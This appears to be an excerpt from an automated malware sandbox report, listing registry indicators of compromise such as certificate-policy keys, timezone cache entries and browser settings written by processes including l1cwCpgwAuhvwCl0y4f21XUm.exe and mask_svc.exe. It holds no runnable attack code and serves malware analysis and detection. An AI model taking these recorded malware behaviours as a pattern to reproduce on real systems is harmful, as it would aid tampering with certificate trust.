\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" l1cwCpgwAuhvwCl0y4f21XUm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" l1cwCpgwAuhvwCl0y4f21XUm.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeSetup.tmpMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nl.norton.com\ = "626" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\Certifi MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" Setup.tmp Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 52d5af60a797d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nl.norton.com\ = "412" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\Certificat MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = 01000000c33a5d247bbaf306d1d641d8c4ac927a73a89e8c5c416f78a8d24fe8860a27f3109ed6a5b42ffb2b0e98b737490a4f91acb0bec4a2c805ff265cabdabd0ec25024b3e094ec915552649233c412bc1a5deab957bf5f4da8e948ee1ab01af75aaaf9188b30d7008de24c65b4d19ce3ca38ef63115df6ee3fc3e129c63a20e5972d636f950a9a9c21e0f5b0f5cee49fb218174f33807ecd83a520ae9ef18ff77a230a574727ec859082a615ea6c1a11cde80c1b05f543095979821b5331f44f2d3e846f243287db879ef233507d125722392668bf6ec8c12e0534124508490c74236a5928bff0bea0deefaa2b33f9920538ced6cd8e1617bbd081314995404ee95503b4f59dba4e9aca951a811270e34d02c705a102a42975d2c61977f97f35b469851f693cabab019f1a2393ce2f68bc3bb2956bad5519a0f1306b85d0b3e0dc876c3c5e17f7f5ecfb1665634cf54243ff642796dffa05fa57cbc5b847eb712842dda95c409d4cbc520080043aa79107184a597ea7530f698e53c9e4b312074bbad00886ecafd0ed3956142a395976369255cc5023b0558071ce53e9ab428cbf553d89ea3ed1c5 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nl.norton.com\ = "406" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\norton.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\norton.com\Total = "406" MicrosoftEdgeCP.exe -
Processes:
